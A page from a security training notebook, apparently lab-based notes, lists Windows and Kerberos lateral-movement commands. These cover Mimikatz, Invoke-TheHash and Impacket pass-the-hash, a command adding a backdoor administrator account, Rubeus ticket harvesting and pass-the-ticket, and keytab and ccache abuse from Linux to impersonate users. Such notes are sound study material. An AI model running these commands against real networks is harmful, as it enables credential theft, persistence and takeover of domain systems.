Martian Defense NoteBook
  • Martian Defense Notebook
  • Training and Career
    • Keeping it Real for Beginners
    • Reading and Repos
    • Media
    • Guides
      • Cybersecurity Roadmaps
      • Cybersecurity Training Topics
      • AppSec Training Pathway
      • Interview Checklist
    • Platforms
      • General
      • Offensive Security
      • Defensive Security
      • CTF Sites
      • Live Vulnerable Sites
    • Entrepreneurship Roadmaps
      • Consulting
      • Starting a Business
  • Technical Resources
    • Offensive-Cybersecurity
      • Application Security
      • General
      • Recon + OSINT
      • Infrastructure Pentesting
      • Cloud Pentesting
      • Wordlists
      • Social Engineering
      • Mobile Pentesting
      • Container Security
      • Blockchain
    • Defensive-Cybersecurity
    • General Cybersecurity
      • Cybersecurity Operating Systems
    • Coding/Programming
    • Reverse Engineering
    • AI and ML
  • Notes
    • Product Security Engineering
      • DevSecOps
        • Docker
          • How to Dockerize Applications with Docker Compose (Using SQLite and Flask)
      • SAST/SCA
        • How to setup a GitHub Action for Code Security analysis
        • JavaScript Security Analysis
        • Java Security 101
        • Tools
        • CodeQL for Beginners
      • Product Security Hardening
      • Threat Modeling
      • PHP Security
    • AppSec Testing
      • Checklists
        • WEB APP PENTESTING CHECKLIST
        • API Testing Checklist
        • Android Pentesting Checklist
        • IoS Pentesting Checklist
        • Thick Client Pentesting Checklist
        • Secure Code Review Checklist
      • Targeted Test Cases
        • Part 1
        • Part 2
      • Common Web Attack and Prevention List
      • Ports and associated Vectors
      • DNS
      • Web Tools
      • Command Injection Testing
      • JWTs and JSON
    • Security Research
      • Publishing CVEs
      • Threat Intelligence
      • Shodan Dork Cheatsheet
      • Github Dorks
      • Bug Bounty
        • Bug Bounty Programs
      • Forums
    • Coding/Programming
      • Secure Coding Practices Checklist
      • JavaScript
      • Python
        • Quick Notes
        • Python Basics for Pentesters
        • Python Snippets
        • XML Basics with Python
      • Golang
        • Theory
        • Security
        • Modules
        • Entry Points
        • File Forensics
        • Cryptography and Encoding
        • Golang Snippets
      • PHP
        • Setup
        • Syntax
        • Variables and Data Types
        • Control Structures
        • Arrays
        • Functions
        • OOP Concepts
        • Database Integration
        • Handling HTTP Methods
        • Session Management
        • File Uploads
        • Email Function
        • Error Handling
        • Advanced Topics and Best Practices
    • Network Security
      • Domain Trust Enumeration
      • Bleeding Edge Vulnerabilities
      • Post-Exploitation
      • Access Control Lists and Entries (ACL & ACE)
      • Credentialed Enumeration
      • Password Attacks
        • Internal Password Spraying
        • Remote Password Attacks
        • Linux Local Password Attacks
        • Windows Local Password Attacks
        • Windows Lateral Movement
      • PowerView
      • Pivoting, Tunneling and Forwarding
        • Advanced Tunneling Methods
        • Dynamic Port Forwarding (SSH + Socks)
        • Port Forwarding Tools
        • SoCat
      • Linux Privilege Escalation
      • Windows Privesc
        • OS Attacks
        • Windows User Privileges
        • Windows Group Privileges
        • Manual Enumeration
        • Credential Theft
      • Kerberos Attacks
        • Kerberos Quick Reference Sheet
    • Cloud Security Testing
    • Defensive Security
      • Splunk
        • Basic Queries
        • Dashboards
      • Forensics
        • Volatility
      • WireShark filters
    • Governance, Risk, Compliance
      • Vulnerability Management Lifecycle
    • Capture-the-Flag Training
      • Vulnerable Machine Checklist
      • Reverse Engineering Checklist
      • Mobile Checklist
      • Forensics Checklist
      • Binary Exploitation
      • Cryptography Checklist
    • Reporting
    • PowerShell
    • Linux Basics
  • Digital Privacy and Hygiene
    • Personal Information Removal Services
    • De-Googling Android
    • DNS Services
    • Privacy References
    • Opsec
  • RedPlanet Labs
    • PyGOAT
    • OWASP Juice Shop
Powered by GitBook
On this page
  • Pass The Hash (Mimikatz)
  • Pass The Hash (Invoke-TheHash)
  • Pass the Hash Impacket (Linux)
  • Pass The Hash CrackMapExec (LInux)
  • Pass The Hash RDP
  • Harvesting Tickets From Windows
  • Pass the Key or OverPass the Hash
  • Pass the Ticket (PtT)
  • Pass The Ticket (From Linux)
  1. Notes
  2. Network Security
  3. Password Attacks

Windows Lateral Movement

Pass The Hash (Mimikatz)

mimikatz.exe privilege::debug "sekurlsa::pth /user:<user> /rc4:<hash> /domain:inlanefreight.htb /run:cmd.exe" exit

Pass The Hash (Invoke-TheHash)

# Import Module
Import-Module .\Invoke-TheHash.psd1

# Pass The Hash
Invoke-SMBExec -Target <IP> -Domain <domain> -Username <username> -Hash <hash> -Command "net user 0xF0rk Password123 /add && net localgroup administrators 0xF0rk /add" -Verbose

# With WMI
Invoke-WMIExec -Target DC01 -Domain <domain> -Username <user> -Hash <hash> -Command "powershell -e <base64 command>"

Pass the Hash Impacket (Linux)

impacket-psexec administrator@<IP> -hashes :<hash>

Pass The Hash CrackMapExec (LInux)

crackmapexec smb <IP> -u Administrator -d . -H <hash> --local-auth

Pass The Hash RDP

# Enable RDP
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

# RDP
xfreerdp  /v:<IP> /u:<user> /pth:<hash>

Harvesting Tickets From Windows

# Mimikatz
## Check Privs
privilege::debug

# Show Tickets
sekurlsa::tickets /export


# Rubeus
Rubeus.exe dump /nowrap

Pass the Key or OverPass the Hash

# Mimikatz Extract Keys
privilege::debug
sekurlsa::ekeys

# Mimikatz OverPass the Hash
sekurlsa::pth /domain:inlanefreight.htb /user:<user> /ntlm:<rc4_value>

# Rubeus
Rubeus.exe  asktgt /domain:inlanefreight.htb /user:plaintext /aes256:<aes256_hmac_Value>

Pass the Ticket (PtT)

# Rubeus
## /ptt -> current session
 Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:<rc4_value>

# Import .Kirbi 
Rubeus.exe ptt /ticket:file.kirbi

# Base64 Encode .Kirbi
Convert]::ToBase64String([IO.File]::ReadAllBytes("file.kirbi"))

# Import With Base64
Rubeus.exe ptt /ticket:<base64>

Pass The Ticket PowerShell Remoting

# Import Ticket
kerberos::ptt "file.kirbi"

# Enter PC
Enter-PSSession -ComputerName <computername>

Pass The Ticket (From Linux)

Check Linux Machine Domain Joined

realm list

ps -ef | grep -i "winbind\|sssd"

Find Keytab Files

find / -name *keytab* -ls 2>/dev/null

Find ccache Files

A credential cache or ccache file holds Kerberos credentials while they remain valid and, generally, while the user's session lasts.

env | grep -i krb5

Abusing KeyTab Files

# Klist List Keytab files
klist -k -l

# Impersonate Other User
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab

# Verify 
klist

Keytab Extract

python3 /opt/blackbuntu/keytabextract.py file.keytab

Abusing Keytab ccache

To abuse a ccache file, all we need is read privileges on the file. These files, located in /tmp, can only be read by the user who created them, but if we gain root access, we could use them.

# Import ccache file
export KRB5CCNAME=<fileL
klist

# Able to read DC
smbclient //dc01/C$ -k -c ls -no-pass

Convert ccache file for Windows

https://github.com/fortra/impacket/blob/master/examples/ticketConverter.py

PreviousWindows Local Password AttacksNextPowerView

Last updated 4 months ago